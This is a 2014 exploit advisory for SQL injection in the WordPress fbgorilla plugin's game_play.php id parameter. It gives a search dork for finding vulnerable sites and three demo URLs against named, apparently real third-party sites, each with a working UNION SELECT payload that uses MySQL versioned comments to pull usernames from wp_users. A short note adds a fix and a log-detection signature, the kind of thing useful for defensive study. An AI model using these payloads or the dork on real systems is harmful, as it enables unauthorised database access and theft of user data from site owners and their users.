
WordPress FBGorilla SQL Injection

Posted on 29 July 2014

##############
# Exploit Title : WordPress fbgorilla plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Home : http://wordpress.org/
#
# Home : www.Ashiyane.org
#
# Security Risk : High
#
# Dork : inurl:wp-content/plugins/fbgorilla/game_play.php?id=
#
##############
# Location : wp-content/plugins/fbgorilla/game_play.php?id=[SQL]
#
# Note : the `id` request parameter apparently reaches the plugin's SQL query unvalidated (the plugin source is not shown here); casting it to an integer or binding it through $wpdb->prepare() closes the injection, and requests to this path whose `id` contains `union`/`select` or `/*!50000 ... */` versioned comments are a usable log-detection signature.
#
# Demo:
# http://online-super-store.net/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users--
# http://hip-hop-abs.nl/wp-content/plugins/fbgorilla/game_play.php?id=-233+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users--
# http://fbgorilla.mobilemarketcreator.com/wp-content/plugins/fbgorilla/game_play.php?id=-233+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users--
##############
# Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############

 
